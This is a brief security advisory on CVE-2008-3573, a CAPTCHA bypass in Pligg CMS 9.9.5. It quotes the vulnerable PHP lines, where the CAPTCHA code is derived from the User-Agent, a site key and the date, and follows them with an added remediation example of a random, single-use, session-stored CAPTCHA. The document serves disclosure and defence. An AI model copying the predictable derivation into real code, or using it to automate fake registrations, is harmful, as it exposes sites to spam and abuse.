Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass

Related Vulnerabilities: CVE-2008-3573  
Publish Date: 02 Aug 2008

Pligg is prone to a security-bypass weakness.

Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead to other attacks.

Pligg 9.9.5 is vulnerable; other versions may also be affected.




$datekey = date('F j');

$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));

print substr($rcode, 2, 6);
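
For contrast with the snippet above, where the expected code is a function of the User-Agent header, a site key, ts_random and the current date, here is an added example (not Pligg's code and not part of the original advisory) of a CAPTCHA answer that comes from a CSPRNG, lives only in the server-side session, and is consumed on the first check. The function names, the 'captcha' session key and the 10-minute lifetime are assumptions.

```php
<?php
// Added example: server-side, single-use CAPTCHA answer.
// Function names, the 'captcha' session key and the TTL are assumptions.
// In a web request, call session_start() before using these functions.

const CAPTCHA_TTL = 600; // seconds an issued answer stays valid (assumed value)

// Create a fresh 6-digit answer that cannot be derived from request data.
function captcha_issue(): string
{
    $code = str_pad((string) random_int(0, 999999), 6, '0', STR_PAD_LEFT);
    $_SESSION['captcha'] = ['code' => $code, 'issued' => time()];
    // Render the return value into the image only; it never goes into
    // a URL, hidden field or cookie.
    return $code;
}

// Check a submitted answer. The stored answer is discarded on every
// attempt, so a failed guess forces a new image to be issued.
function captcha_verify(string $submitted): bool
{
    $entry = $_SESSION['captcha'] ?? null;
    unset($_SESSION['captcha']);
    if (!is_array($entry)) {
        return false; // nothing issued, or already consumed
    }
    if (time() - $entry['issued'] > CAPTCHA_TTL) {
        return false; // expired
    }
    return hash_equals($entry['code'], $submitted); // constant-time compare
}

// Constructed demonstration for the CLI; $_SESSION is used as a plain array.
if (PHP_SAPI === 'cli') {
    $_SESSION = [];
    $code = captcha_issue();
    var_dump(captcha_verify('not-it')); // wrong guess consumes the answer
    var_dump(captcha_verify($code));    // same answer replayed afterwards
    $code = captcha_issue();
    var_dump(captcha_verify($code));    // fresh answer, first attempt
}
```

Registration handlers would call captcha_verify() before creating the account and call captcha_issue() again whenever the form is redisplayed.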
